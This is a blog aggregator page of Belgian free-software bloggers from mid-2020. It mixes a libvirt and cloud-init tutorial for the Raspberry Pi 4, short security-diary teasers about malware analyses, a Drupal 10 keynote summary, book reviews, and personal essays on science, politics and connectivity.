Planet Grep

Planet'ing Belgian FLOSS people

Planet Grep is maintained by Wouter Verhelst. All times are in UTC.

August 09, 2020

PowerPC Notebook

powerpc noetbook

I prefer RISC as a CPU architecture over CISC. RISC is a simpler design that should deliver more CPU performance with fewer transistors and is more power-efficient. We have to recognize that Intel and AMD have made great progress in increasing the performance and efficiency of the x86 CISC architecture.

But the x86 architecture comes with a FreeDOM cost, Intel has the Intel Management Engine and closed Proprietary software is required to initialize the components. The same can be said about AMD; AMD has the AMD Platform Security Processor and binary blobs are required.

Power is currently the most powerful alternative that doesn’t require binary blobs; this is not only great for free/open source activists. A truly open-source firmware that can be reviewed / audited is also for nice security reasons.

For these reasons; I support the PowerPC notebook initiative: This project tries to design an open-hardware PowerPC notebook, the schematics are already completed and available at GitLab:

There is a donation campaign running by the project to complete the PCB design at:

If this project interest you, you might consider donating to it.

Have fun!

August 06, 2020

I published the following diary on “A Fork of the FTCode Powershell Ransomware“:

Yesterday, I found a new malicious Powershell script that deserved to be analyzed due to the way it was dropped on the victim’s computer. As usual, the malware was delivered through a malicious Word document with a VBA macro. A first observation reveals that it’s a file less macro. The malicious Base64 code  is stored in multiples environment variables that are concatenated then executed through an IEX command… [Read more]

The post [SANS ISC] A Fork of the FTCode Powershell Ransomware appeared first on /dev/random.

August 03, 2020

I got a Raspberry PI 4 to play with and installed Manjaro GNU/Linux on it.

I use OpenZFS on my PI. The latest kernel update broke zfs on my PI due to a License conflict, the solution is to disable PREEMPT in the kernel config. This BUG was already resolved with OpenZFS with the main Linux kernel tree at least on X86_64/AMD64, not sure why the kernel on the raspberry pi is still affected.

I was looking for an excuse to build a custom kernel for my Pi anyway :-). I cloned the default manjaro RPI4 kernel and disabled PREEMPT in the kernel config.

The package is available at: This package also doesn’t update /boot/config.txt and /boot/cmdline.txt to not overwrite custom settings.

Have fun!

I published the following diary on “Powershell Bot with Multiple C2 Protocols“:

I spotted another interesting Powershell script. It’s a bot and is delivered through a VBA macro that spawns an instance of msbuild.exe This Windows tool is often used to compile/execute malicious on the fly (I already wrote a diary about this technique). I don’t have the original document but based on a technique used in the macro, it is part of a Word document. It calls Document_ContentControlOnEnter… [Read more]

The post [SANS ISC] Powershell Bot with Multiple C2 Protocols appeared first on /dev/random.

August 01, 2020

Een oude man (spoorweg-ambtenaar) kijkt terug en beschrijft ordelijk zijn doodgewone leven (dat niet altijd zo doodgewoon was).

Wanneer hij midden in zijn autobiografie herstelt van een lichte beroerte (of hartaanval?), komt hij met zichzelf in aanvaring en stelt het eigen leven en motieven in vraag om tot de filosofisch-psychologische conclusie te komen dat hij verschillende personen in zich had die met verschillende motieven goede en minder goede dingen deden waarbij soms de ene en soms de andere voorop liep en dat zijn leven op die manier ook heel anders had kunnen lopen.

Ik kon me er op Goodreads niet toe brengen meer dan 3/5 sterren te geven.

July 31, 2020

Het verontrustende is dat het niet meer verontrustend is wanneer de President van de Verenigde Staten zegt dat hij Duitsland niet zou helpen wanneer Rusland zou aanvallen. Gelukkig is het heet worden van de koude oorlog met Rusland verder af dan ongeveer wat dan ook aan mogelijke alternatieven. Ongeacht wat bepaalde propaganda-machines ons proberen wijs te maken.

Ondertussen werken we nog steeds niet aan een eigen Europees leger. Voor stel dat het toch ooit nodig is.

Het is wel Duitslands eigen beslissing om via Northstream 2 gas uit Rusland aan te kopen en te transporteren. En het is dus niet aan de Verenigde Staten om zich daar mee te moeien. Ook niet door druk te zetten door middel van misbruik te maken van NAVO afspraken.

Het wordt nu echt tijd om de NAVO op pensioen te sturen. Dit kan zo niet meer. Twitter of niet. Clown of niet. De woorden van een President hebben gevolgen.

Zo zijn we misschien op tijd om die gaspijpleiding tegen Amerikaanse agressie te beschermen? Want het lijkt er op dat we Amerikaanse bommen gaan krijgen op dat project als we hun idiote ongevraagde en ongewenste LNG niet in ons strot doorslikken.

July 30, 2020

July 27, 2020

The other day, we went to a designer's fashion shop whose owner was rather adamant that he was never ever going to wear a face mask, and that he didn't believe the COVID-19 thing was real. When I argued for the opposing position, he pretty much dismissed what I said out of hand, claiming that "the hospitals are empty dude" and "it's all a lie". When I told him that this really isn't true, he went like "well, that's just your opinion". Well, no -- certain things are facts, not opinions. Even if you don't believe that this disease kills people, the idea that this is a matter of opinion is missing the ball by so much that I was pretty much stunned by the level of ignorance.

His whole demeanor pissed me off rather quickly. While I disagree with the position that it should be your decision whether or not to wear a mask, it's certainly possible to have that opinion. However, whether or not people need to go to hospitals is not an opinion -- it's something else entirely.

After calming down, the encounter got me thinking, and made me focus on something I'd been thinking about before but hadn't fully forumlated: the fact that some people in this world seem to misunderstand the nature of what it is to do science, and end up, under the claim of being "sceptical", with various nonsense things -- see scientology, flat earth societies, conspiracy theories, and whathaveyou.

So, here's something that might (but probably won't) help some people figuring out stuff. Even if it doesn't, it's been bothering me and I want to write it down so it won't bother me again. If you know all this stuff, it might be boring and you might want to skip this post. Otherwise, take a deep breath and read on...

Statements are things people say. They can be true or false; "the sun is blue" is an example of a statement that is trivially false. "The sun produces light" is another one that is trivially true. "The sun produces light through a process that includes hydrogen fusion" is another statement, one that is a bit more difficult to prove true or false. Another example is "Wouter Verhelst does not have a favourite color". That happens to be a true statement, but it's fairly difficult for anyone that isn't me (or any one of the other Wouters Verhelst out there) to validate as true.

While statements can be true or false, combining statements without more context is not always possible. As an example, the statement "Wouter Verhelst is a Debian Developer" is a true statement, as is the statement "Wouter Verhelst is a professional Volleybal player"; but the statement "Wouter Verhelst is a professional Volleybal player and a Debian Developer" is not, because while I am a Debian Developer, I am not a professional Volleybal player -- I just happen to share a name with someone who is.

A statement is never a fact, but it can describe a fact. When a statement is a true statement, either because we trivially know what it states to be true or because we have performed an experiment that proved beyond any possible doubt that the statement is true, then what the statement describes is a fact. For example, "Red is a color" is a statement that describes a fact (because, yes, red is definitely a color, that is a fact). Such statements are called statements of fact. There are other possible statements. "Grass is purple" is a statement, but it is not a statement of fact; because as everyone knows, grass is (usually) green.

A statement can also describe an opinion. "The Porsche 911 is a nice car" is a statement of opinion. It is one I happen to agree with, but it is certainly valid for someone else to make a statement that conflicts with this position, and there is nothing wrong with that. As the saying goes, "opinions are like assholes: everyone has one". Statements describing opinions are known as statements of opinion.

The differentiating factor between facts and opinions is that facts are universally true, whereas opinions only hold for the people who state the opinion and anyone who agrees with them. Sometimes it's difficult or even impossible to determine whether a statement is true or not. The statement "The numbers that win the South African Powerball lottery on the 31st of July 2020 are 2, 3, 5, 19, 35, and powerball 14" is not a statement of fact, because at the time of writing, the 31st of July 2020 is in the future, which at this point gives it a 1 in 24,435,180 chance to be true). However, that does not make it a statement of opinion; it is not my opinion that the above numbers will win the South African powerball; instead, it is my guess that those numbers will be correct. Another word for "guess" is hypothesis: a hypothesis is a statement that may be universally true or universally false, but for which the truth -- or its lack thereof -- cannot currently be proven beyond doubt. On Saturday, August 1st, 2020 the above statement about the South African Powerball may become a statement of fact; most likely however, it will instead become a false statement.

An unproven hypothesis may be expressed as a matter of belief. The statement "There is a God who rules the heavens and the Earth" cannot currently (or ever) be proven beyond doubt to be either true or false, which by definition makes it a hypothesis; however, for matters of religion this is entirely unimportant, as for believers the belief that the statement is correct is all that matters, whereas for nonbelievers the truth of that statement is not at all relevant. A belief is not an opinion; an opinion is not a belief.

Scientists do not deal with unproven hypotheses, except insofar that they attempt to prove, through direct observation of nature (either out in the field or in a controlled laboratory setting) that the hypothesis is, in fact, a statement of fact. This makes unprovable hypotheses unscientific -- but that does not mean that they are false, or even that they are uninteresting statements. Unscientific statements are merely statements that science cannot either prove or disprove, and that therefore lie outside of the realm of what science deals with.

Given that background, I have always found the so-called "conflict" between science and religion to be a non-sequitur. Religion deals in one type of statements; science deals in another. The do not overlap, since a statement can either be proven or it cannot, and religious statements by their very nature focus on unprovable belief rather than universal truth. Sure, the range of things that science has figured out the facts about has grown over time, which implies that religious statements have sometimes been proven false; but is it heresy to say that "animals exist that can run 120 kph" if that is the truth, even if such animals don't exist in, say, Rome?

Something very similar can be said about conspiracy theories. Yes, it is possible to hypothesize that NASA did not send men to the moon, and that all the proof contrary to that statement was somehow fabricated. However, by its very nature such a hypothesis cannot be proven or disproven (because the statement states that all proof was fabricated), which therefore implies that it is an unscientific statement.

It is good to be sceptical about what is being said to you. People can have various ideas about how the world works, but only one of those ideas -- one of the possible hypotheses -- can be true. As long as a hypothesis remains unproven, scientists love to be sceptical themselves. In fact, if you can somehow prove beyond doubt that a scientific hypothesis is false, scientists will love you -- it means they now know something more about the world and that they'll have to come up with something else, which is a lot of fun.

When a scientific experiment or observation proves that a certain hypothesis is true, then this probably turns the hypothesis into a statement of fact. That is, it is of course possible that there's a flaw in the proof, or that the experiment failed (but that the failure was somehow missed), or that no observance of a particular event happened when a scientist tried to observe something, but that this was only because the scientist missed it. If you can show that any of those possibilities hold for a scientific proof, then you'll have turned a statement of fact back into a hypothesis, or even (depending on the exact nature of the flaw) into a false statement.

There's more. It's human nature to want to be rich and famous, sometimes no matter what the cost. As such, there have been scientists who have falsified experimental results, or who have claimed to have observed something when this was not the case. For that reason, a scientific paper that gets written after an experiment turned a hypothesis into fact describes not only the results of the experiment and the observed behavior, but also the methodology: the way in which the experiment was run, with enough details so that anyone can retry the experiment.

Sometimes that may mean spending a large amount of money just to be able to run the experiment (most people don't have an LHC in their backyard, say), and in some cases some of the required materials won't be available (the latter is expecially true for, e.g., certain chemical experiments that involve highly explosive things); but the information is always there, and if you spend enough time and money reading through the available papers, you will be able to independently prove the hypothesis yourself. Scientists tend to do just that; when the results of a new experiment are published, they will try to rerun the experiment, partially because they want to see things with their own eyes; but partially also because if they can find fault in the experiment or the observed behavior, they'll have reason to write a paper of their own, which will make them a bit more rich and famous.

I guess you could say that there's three types of people who deal with statements: scientists, who deal with provable hypotheses and statements of fact (but who have no use for unprovable hypotheses and statements of opinion); religious people and conspiracy theorists, who deal with unprovable hypotheses (where the religious people deal with these to serve a large cause, while conspiracy theorists only care about the unprovable hypotheses); and politicians, who should care about proven statements of fact and produce statements of opinion, but who usually attempt the reverse of those two these days :-/


mic drop

Notre vie n’est plus qu’une attente. L’attente du prochain message, de la prochaine notification, de la prochaine nouvelle, de la prochaine tâche.

En devenant hyperproductifs, nous avons réduit le temps consacré à la pratique. Nous nous concentrons avec une efficacité redoutable pour respecter une échéance. Avant d’attendre.

Nous appelons ça le repos, la consultation de nouvelles, la distraction. C’est en réalité une attente, un entre-deux.

Nous espérions que nos engins connectés puissent meubler nos temps morts, puissent nous rendre productifs lorsque nous étions forcés d’attendre. En réalité, nous attendons désormais de nous connecter. Notre téléphone ne nous occupe plus dans la file. C’est le serveur qui interrompt notre connexion pour nous apporter le café.

Les emails, les chats ont rendu les interactions permanentes. Si au départ, ces outils nous permettaient d’attendre notre prochaine rencontre, aujourd’hui une rencontre est une attente avant de nous replonger dans nos outils.

Le rêve d’une humanité connectée est en passe de se réaliser. Mais cet incroyable espace partagé s’est révélé une gigantesque salle d’attente. Ensemble, nous attendons, qui l’amour, qui la reconnaissance, qui la gloire, qui un renouveau politique.

Nous ne réalisons pas que ceux qui trouvent ou cessent d’attendre s’éclipsent subtilement. Nous attendons. Nous consacrons plus d’énergie à tenter de promouvoir nos réalisations qu’à les accomplir. Nous lisons à toute vitesse pour remporter des challenges de lecture, nous voulons faire rire nos enfants pour en partager la photo. Notre vie est une attente pour nous reconnecter à la salle d’attente, celle où nous dévorons et partageons les conseils pour vivre une vie meilleure.

Et lorsque nous croyons briser le cercle vicieux, lorsque nous pensons nous reconnecter à nous-mêmes plutôt qu’au reste du monde, nous attendons avec impatience ce moment où nous pourrons enfin le partager, le faire exister à travers le regard virtuel des autres en train d’attendre.

Photo by Anthony Tran on Unsplash

Je suis @ploum, écrivain électronique. Si vous avez apprécié ce texte, n'hésitez pas à me soutenir sur Paypal ou en millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Vos soutiens réguliers, même symboliques, sont une réelle motivation et reconnaissance. Merci !

Ce texte est publié sous la licence CC-By BE.

This past weekend Vanessa and I went camping in Phippsburg, Maine just three hours north from where we live. During this pandemic I have missed travel and adventure. It was really nice to swap out the espresso machine for the percolator and to spend time in nature.

Coffee and eggs for breakfast
A coffee percolator.
View from inside our tent: our legs are shown in the foreground and the ocean in the background.
Waking up overlooking the ocean.
Dries reading by the fire
Reading The Ride of a Lifetime by the campfire.

July 25, 2020

I published the following diary on “Compromized Desktop Applications by Web Technologies”:

For a long time now, it has been said that “the new operating system is the browser”. Today, we do everything in our browsers, we connect to the office, we process emails, documents, we chat, we perform our system maintenances, … But many popular web applications provide also a desktop client: Twitter, Facebook, Slack are good examples. Such applications just replace the classic browser and use the API’s to interact with the official website. Most applications are developed in a compiled language and are deployed as regular executable files. Others rely on web technologies or have a modular architecture that helps to add features via a system of plugins or modules… [Read more]

The post [SANS ISC] Compromized Desktop Applications by Web Technologies appeared first on /dev/random.

July 24, 2020

Update June 28th: 2.7.6 was released, all is (or should be) fine … :-)

There currently are 2 known issues in Autoptimize 2.7.5 that will be fixed in the next release;

  1. when “inline & defer CSS” and “also aggregate inline CSS” are active then for logged in users the top “admin bar” might become invisible. unticking “also aggregate inline CSS” is a confirmed workaround.
  2. when “inline & defer CSS” is active, CSS-files that are not aggregated (excluded or 3rd party) and that do not have a media-attribute will not be deferred.

If you want you can download the beta of what will become 2.7.6 here and install that instead of 2.7.5 to get rid of these known issues.

July 23, 2020

I published the following diary on “Simple Blacklisting with MISP & pfSense“:

Here is an example of a simple but effective blacklist system that I’m using on my pfSense firewalls. pfSense is a very modular firewall that can be expanded with many packages. About blacklists, there is a well-known one called pfBlocklist. Personally, I prefer to avoid installing extra packages on my firewalls because it increases the risk to face potential problems while upgrading (pfSense recommends to disable them before any upgrade). Some packages might also be developed by 3rd parties that have a light security mindset and, therefore, introduce bugs in a core element of the infrastructure… [Read more]

The post [SANS ISC] Simple Blacklisting with MISP & pfSense appeared first on /dev/random.

I got a Raspberry PI 4 to play with and installed Manjaro GNU/Linux on it.

I wanted to verify how usable the latest PI is for desktop and home server usage.

  • For desktop usage, it is “usable”.

    For video playback in the browser, I recommend disabling 60fps ( and keep the video playback to 720p. Please note that if you want to use it for Netflix you will need Widevine for the DRM content. As far as I know, there isn’t an ARM64 version available. An ARM32 version exists but I didn’t try (yet).

  • For (home) server usage ARM64 or AArch64 is getting more usable.

    Cloud providers are also offering ARM64 based systems. A container-based workload - like Docker, LXC, FreeBSD jails etc - is probably better suited for a small device like the Raspberry PI. Virtual machines are still important for server usage so let see how the PI4 can handle it.

Most GNU/Linux distributions RedHat, Centos, Ubuntu, Debian are offering cloud images for ARM64. To configure these images you’ll need cloud-init.

I already wrote a blog post on howto cloud-init for KVM/libvirt on GNU/Linux: Howto use centos cloud images with cloud-init on KVM/libvirtd. Let see if we can get it working on ARM64.

If you want to use an USB storage device (even with a SSD) I recommend using Y-USB powered cable or a powered storage enclosure.


I always use OpenZFS for my important data. On Archlinux, ZFS is available at the AUR and The more or less default ZFS AUR packages - zfs-dkms and zfs-utils - have a dependency to x86_64 architecture. Lucky somebody already created packages that work fine on any platform - zfs-dkms-any & zfs-utils-any -.

Install yay

Yay is a nice tool to install AUR packages automatically. Let’s make our life easier and install it.

Install the base development packages.

[staf@minerva ~]$ sudo pacman -Sy base-devel

Install yay.

Create a git directory.

[staf@minerva ~]$ mkdir github
[staf@minerva ~]$ cd github/
[staf@minerva github]$ 

Clone the git repo.

[staf@minerva github]$ git clone

Build and install the package.

[staf@minerva github]$ cd yay
[staf@minerva yay]$ makepkg -si

Install OpenZFS

Install the zfs-dkms-any zfs-utils-any packages.

[staf@minerva ~]$ yay -S zfs-dkms-any zfs-utils-any

Install libvirt/QEMU

On an x86_64 we’d start with verifying that the CPU has virtualization enabled. By verifying /proc/cpuinfo or lscpu, but I don’t know if an ARM64 CPU has a flag for it. lscpu doesn’t report virtualization support on the Raspberry PI.

Install the required packages.

[root@minerva ~]# pacman -S libvirt qemu lxc ebtables dnsmasq bridge-utils openbsd-netcat dmidecode virt-manager

Start and enable the libvirtd systemd service.

[root@minerva ~]# systemctl start libvirtd
[root@minerva ~]# systemctl enable libvirtd

Execute virt-host-validate to ensure that the virtualization works correctly.

[staf@minerva ~]$ virt-host-validate
  QEMU: Checking if device /dev/kvm exists                                   : PASS
  QEMU: Checking if device /dev/kvm is accessible                            : PASS
  QEMU: Checking if device /dev/vhost-net exists                             : PASS
  QEMU: Checking if device /dev/net/tun exists                               : PASS
  QEMU: Checking for cgroup 'cpu' controller support                         : PASS
  QEMU: Checking for cgroup 'cpuacct' controller support                     : PASS
  QEMU: Checking for cgroup 'cpuset' controller support                      : PASS
  QEMU: Checking for cgroup 'memory' controller support                      : PASS
  QEMU: Checking for cgroup 'devices' controller support                     : PASS
  QEMU: Checking for cgroup 'blkio' controller support                       : PASS
WARN (Unknown if this platform has IOMMU support)
   LXC: Checking for Linux >= 2.6.26                                         : PASS
   LXC: Checking for namespace ipc                                           : PASS
   LXC: Checking for namespace mnt                                           : PASS
   LXC: Checking for namespace pid                                           : PASS
   LXC: Checking for namespace uts                                           : PASS
   LXC: Checking for namespace net                                           : PASS
   LXC: Checking for namespace user                                          : PASS
   LXC: Checking for cgroup 'cpu' controller support                         : PASS
   LXC: Checking for cgroup 'cpuacct' controller support                     : PASS
   LXC: Checking for cgroup 'cpuset' controller support                      : PASS
   LXC: Checking for cgroup 'memory' controller support                      : PASS
   LXC: Checking for cgroup 'devices' controller support                     : PASS
   LXC: Checking for cgroup 'freezer' controller support                     : PASS
   LXC: Checking for cgroup 'blkio' controller support                       : PASS
   LXC: Checking if device /sys/fs/fuse/connections exists                   : PASS
[staf@minerva ~]$ 

Install UEFI aarch64

As a first, test I started virt-manager to install the Debian ARM64 installation iso but virt-manager reported that UEFI was missing. Tianocore is an opensource implementation of the UEFI firmware that can be used with libvirtd.

It is not available in the standard Manjaro repo available. But there is an AUR package is available.

[staf@minerva ~]$ yay -Ss tianocore 
aur/edk2-avmf 20200201-1 (+2 0.42) (Installed)
    QEMU ARM/AARCH64 Virtual Machine Firmware (Tianocore UEFI firmware).
aur/ovmf-git 1:r25361.514c55c185-1 (+30 0.00) 
    Tianocore UEFI firmware for qemu.
aur/uefi-shell-git 26946.edk2.stable201903.1209.gf8dd7c7018-1 (+49 0.08) 
    UEFI Shell v2 - from Tianocore EDK2 - GIT Version
[staf@minerva ~]$ yay -Ss edk2-avmf

After the installation the test install with the Debian ARM64 iso image went fine just like on an x86_64 system.

Cloud image

There are cloud images available for most popular GNU/Linux distributions for the ARM64 architecture. I’ll use Ubuntu in the example below.


Cloud-init isn’t available on Marjano, the cloud-utils package is available. It isn’t required to have cloud-init on the libvirt host to install a cloud image. But it’s useful to have it to check the syntax etc. You can do this on another system or try to install from source (see links below).

Install the cloud-utils package.

[staf@minerva ~]$ pkgfile cloud-localds
[staf@minerva ~]$ sudo pacman -S cloud-utils

Download the cloud image


Download the Ubuntu cloud image from and verify your download.


Verify the checksum file

You can verify the list of GPG keys used by Ubuntu at

staf@minerva ubuntu]$ gpg --keyid-format long  --verify SHA256SUMS.gpg SHA256SUMS
gpg: Signature made Tue 14 Jul 2020 23:29:05 CEST
gpg:                using RSA key 1A5D6C4C7DB87C81
gpg: Can't check signature: No public key

Import the GPG public key.

[staf@minerva ubuntu]$ gpg --keyid-format long --keyserver hkp:// --recv-keys 1A5D6C4C7DB87C81
gpg: key 1A5D6C4C7DB87C81: public key "UEC Image Automatic Signing Key <>" imported
gpg: Total number processed: 1
gpg:               imported: 1
[staf@minerva ubuntu]$ 

And verify again.

[staf@minerva ubuntu]$ gpg --keyid-format long  --verify SHA256SUMS.gpg SHA256SUMS
gpg: Signature made Tue 14 Jul 2020 23:29:05 CEST
gpg:                using RSA key 1A5D6C4C7DB87C81
gpg: Good signature from "UEC Image Automatic Signing Key <>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: D2EB 4462 6FDD C30B 513D  5BB7 1A5D 6C4C 7DB8 7C81
[staf@minerva ubuntu]$ 

The “Primary key fingerprint” has to match the fingerprint on

Verify the image

[staf@minerva ubuntu]$ sha256sum -c SHA256SUMS 2>&1 | grep OK
focal-server-cloudimg-arm64.img: OK
[staf@minerva ubuntu]$ 



The image is a normal qcow2 image file.

[staf@minerva ubuntu]$ file focal-server-cloudimg-arm64.img 
focal-server-cloudimg-arm64.img: QEMU QCOW2 Image (v2), 2361393152 bytes
[staf@minerva ubuntu]$ 

Use qemu-info to get more information about the image.

[staf@minerva ubuntu]$ qemu-img info focal-server-cloudimg-arm64.img 
image: focal-server-cloudimg-arm64.img
file format: qcow2
virtual size: 2.2 GiB (2361393152 bytes)
disk size: 493 MiB
cluster_size: 65536
Format specific information:
    compat: 0.10
    refcount bits: 16
[staf@minerva ubuntu]$ 

Copy & resize

Copy the image to the final location.

[root@minerva ubuntu]# cp -v focal-server-cloudimg-arm64.img  /var/lib/libvirt/images/ubuntu/tst.qcow2
'focal-server-cloudimg-arm64.img' -> '/var/lib/libvirt/images/ubuntu/tst.qcow2'
[root@minerva ubuntu]# 

and resize the image.

[root@minerva ubuntu]# cd /var/lib/libvirt/images/ubuntu/
[root@minerva ubuntu]# qemu-img resize tst.qcow2 20G


Upgrade and default user

A complete overview of cloud-init configuration directives is available at

We’ll create a cloud-init configuration file to update all the packages - which is always a good idea - and add a default user to the system.

A cloud-init configuration file has to start with #cloud-config, remember this is YAML so only use spaces…

We’ll create a password hash that we’ll put into your cloud-init configuration, it’s also possible to use a plain-text password in the configuration with chpasswd or to set the password for the default user. But it’s better to use a hash so nobody can see the password. Keep in mind that is still possible to brute-force the password hash.

Some (Debian based) GNU/Linux distributions have the mkpasswd utility this is not available on Manjaro. The mkpasswd utility part of the expect package is something else…

I used a python one-liner to generate the SHA512 password hash.

python -c 'import crypt,getpass; print(crypt.crypt(getpass.getpass(), crypt.mksalt(crypt.METHOD_SHA512)))'

Execute the one-liner and type in your password.

Create config.yaml - replace <your_user>, <your_hash>, <your_ssh_pub_key> - with your data:

  package_upgrade: true
    name: <your_user>
    groups: wheel
    lock_passwd: false
    passwd: <your_hash>
    shell: /bin/bash
    sudo: ['ALL=(ALL) NOPASSWD:ALL']
      - ssh-rsa <your_ssh_pub_key>

You can validate the cloud-init file with cloud-init devel schema, Manjaro doesn’t have the cloud-init package. You can compile it from source or verify it a system that has cloud-init installed.

[root@minerva ubuntu]# cloud-init devel schema --config-file config.yaml
Valid cloud-config file config.yaml
[root@minerva ubuntu]# 


Create a network config file.

version: 2
     addresses: [ ]
       addresses: [ ]

create the config.iso

[root@minerva ubuntu]# cloud-localds config.iso config.yaml --network-config net_config.yaml 
[root@minerva ubuntu]# 

Create the virtual system

Libvirt has predefined definitions for operating systems. You can query the predefined operation systems with the osinfo-query os command.

We use Ubuntu 20.04, we use osinfo-query os to find the correct definition.

[root@minerva ubuntu]# osinfo-query os | grep -i ubuntu | grep 20
 ubuntu20.04          | Ubuntu 20.04                                       | 20.04    |          
[root@minerva ubuntu]# 

Create the virtual machine.

[root@minerva ubuntu]# cat 
virt-install \
  --memory 2048 \
  --vcpus 1 \
  --name tst \
  --disk /var/lib/libvirt/images/ubuntu/tst.qcow2,device=disk \
  --disk /var/lib/libvirt/images/ubuntu/config.iso,device=cdrom \
  --os-type Linux \
  --os-variant ubuntu20.04 \
  --virt-type kvm \
  --graphics none \
  --network network:default \
[root@minerva ubuntu]# 

The default escape key - to get out the console is ^] ( Ctrl + ] )

Have fun!


July 20, 2020

Last week, Drupalists from around the world gathered for DrupalCon Global. This DrupalCon was the first ever virtual event of this scale for the Drupal community.

As a matter of tradition, I delivered the opening keynote. You can watch a video recording of my keynote, download a copy of my slides (212 MB), or read the brief summary below.

The online conference web application showing my slides, my webcam, and real-time chat.
A screenshot of the first ever virtual DriesNote. The virtual conference tool showed my slides, my webcam, and real-time chat.

I announced that we are targeting the release of Drupal 10 around June 2022.

Next, I spent the majority of my presentation proposing five strategic initiatives for Drupal 10. While it seems early to speak about Drupal 10, we need to start working on these strategic goals now to have them ready by the time Drupal 10 is released.

A slide from the DriesNote showing that the goal of the presentation is to propose five well-balanced initiatives for Drupal 10.
The goal of my presentation was to propose five well-balanced initiatives for Drupal 10.

We decided to go with just five initiatives so we're more focused and because the Drupal 10 release cycle will be shorter than Drupal 9's. Selecting only five initiatives was hard. I spent 35 minutes walking the audience through the selection process. The five proposed initiatives:

  1. Drupal 10 readiness
  2. An easier out-of-the-box experience
  3. A new front-end theme (Olivero)
  4. Automated updates for security releases
  5. An official JS menu component for React and Vue

1. Drupal 10 readiness

Drupal depends on third-party software components, many of which will go end-of-life (EOL) in the next few years. When a component goes EOL, it will no longer receive security support.

The "Drupal 10 Readiness" initiative will focus on upgrading these third-party components. Not only does this keep Drupal secure, it also allows us to take advantage of any new capabilities that come with these updated components.

A slide from the DriesNote with a table that lists jQuery 3, CKEditor 4, jQuery UI, PHPUnit 8, Symfony 4, PHP 7, Composer 1, etc
Some of the third-party components that need to be updated in preparation for Drupal 10.

2. Easy out-of-the-box

Improving Drupal's ease-of-use remains the number one most impactful item for the community to work on.

Drupal 9 dramatically improved Drupal's ease-of-use. Several of our most promising improvements made it very far, but still need some finishing touches. Specifically, our new Media Library, Layout Builder and Administration Theme (Claro) are not yet enabled by default.

I proposed the "Easy out-of-the-box" initiative to work towards enabling these features by default. I believe this initiative will be very impactful in terms of attracting new users to Drupal.

A slide from the DriesNote visualizing the 'Easy out of the box' as the sum of Media, Layout Builder and Claro.
The 'Easy out of the box' initiative consists of finishing Media, Layout Builder and Claro.

3. Front end theme

One of the most important features to complete is our modern front end theme, Olivero. While there has been a lot of progress in this area, Olivero does not ship with Drupal yet. We want to make sure this beautiful front end theme is available by default.

A screenshot of the upcoming front-end theme called Olivero. It looks clean, modern and light.
A screenshot of the upcoming front-end theme called Olivero.

4. Automatic updates

As shown by the Drupal 2020 Product Survey, by far the most requested feature is automated updates.

Fortunately, it's something we have been working on for some time. Our first milestone will be to automate security updates so all site owners can sleep well at night, no matter when security releases are taking place.

Beyond security, automated updates help us work towards our long-term vision of building a composable — or Assembed Web — architecture for Drupal.

The Automated Updates initiative requires integrity checks for Drupal core, Composer 2, package signing and a custom bootloader.
The four major architectural building blocks of the Automated Updates initiative.

5. JavaScript menu component

As I have been saying for years now, many websites are evolving into personalized, omnichannel digital experiences. It's a multi-decade trend, and one of the most powerful ones in our industry.

Drupal needs to keep evolving with this trend in mind. On the back end, we need to continue to make Drupal the best structured data engine and web service platform. On the front end, JavaScript continues to grow fast. While Drupal is recognized as a capable headless or decoupled CMS, there is still more we can do.

Furthermore, the second most requested feature in the Drupal 2020 Product Survey was a more modern administration UI. These kinds of UIs are typically built using JavaScript and web service APIs. When done well, a JavaScript UI can offer major usability improvements.

Clearly, there is more than one reason to invest in web service APIs and to embrace more JavaScript in Drupal:

  1. Many of Drupal's end users are focused on building decoupled front ends and omnichannel digital experiences.
  2. Drupal could improve its own administration UI with more WYSIWYG, drag-and-drop, and other ease-of-use features.

To make a start toward improving Drupal's headless capabilities and administration UI, I proposed we start to add official Drupal JavaScript components to Drupal Core.

As a first step, I recommended implementing a JavaScript menu component in Vue and React. This would mark the first official JavaScript component in Drupal.

A slide from the DriesNote that shows a flag with the text 'Decoupled menu components' waving on the top of a mountain.
'Planting the flag' for providing official JavaScript menu components for Drupal.

Developing a JavaScript menu component solves a very real problem that many front end developers face. This menu component would render a menu and could be placed in a front end JavaScript application. The content of the menu comes from Drupal. This would allow content authors and non-developers to make simple menu changes without the need for custom code.

Releasing a first official JavaScript component will require us to set up the tools and processes to manage and release JavaScript components. This will establish a pattern or recipe for more components. Once we build one component, it will be easier to add many more in parallel.

A slide from the DriesNote that shows the long path to the flag at the top of the mountain.
The path to having a first official JavaScript component is longer than it may appear.

Let's do this!

A slide from the DriesNote that shows a fictitious Drupal 10 press release dated June 2022.
A fictitious or forward-looking press release for Drupal 10 in June 2022.

With the release of Drupal 10 targeted for June 2022, our community has a big opportunity to make the beginner and non-developer experiences much simpler, while still keeping Drupal's power as strong as ever for experts. I believe the proposed strategic initiatives will help achieve that.

For more details, I recommend you watch the recording of my presentation.

Whether you're just getting started with Drupal or have been here for years, we want you to contribute to Drupal 10! The best way to get involved in any of these initiatives is to join their discussion channels on Drupal Slack:

  • Drupal 10 readiness: #d10readiness
  • Claro: #admin-ui
  • Olivero: #d9-theme
  • Automated updates: #autoupdates
  • JS Menu Component: #js-menu-component

Thank you to everyone who attended the very first Drupalcon Global and contributed to the event's success. Even though we were unable to meet in person, I was blown away by the energy of everyone involved, and grateful for the time to connect with old and new friends.

July 18, 2020

Gelezen en goedgekeurd; “Reis bij Maanlicht” van Antal Szerb, geschreven in 1937 maar niet gedateerd.

Onderwerpen: een huwelijksreis, een psychose, eros en thanatos, voorbije vriendschappen en het zich al dan niet conformeren. En over Venetië, Florence, Spello, Rome, …

July 17, 2020

Het komt uiteraard van één of ander forum. Maar ik wilde dit dus toch eventjes vereeuwigen in één van mijn fameuze ontzettend belangrijke blog posts. Zodat de ganse wereld het voor goed zou kunnen naslagen.

Het is ook belangrijk voor stel dat je me onder contract neemt. Zo weet je te minste wat deze zagevent continu in je organisatie zal zeggen tegen iedereen als advies hierover.

Dat doe ik dan vooral omdat ik best wel wat ervaring heb in wat niet werkt (dat vooral) en ook in wat wel werkt. Het is me opgevallen dat er erg veel geprobeerd wordt met alles waar ik ervaring in heb en waarvan ik weet dat het niet werkt.

Maarja. Iedere project manager wil bewijzen dat hij of zij dat kan bestieren dat wat bewezen is niet te werken. Op zichzelf is dat prima. Dan factureer ik als freelancer gewoon meer en langer geld uit zijn project-budget. Maar niettemin zal ik dus altijd het volgende adviseren:

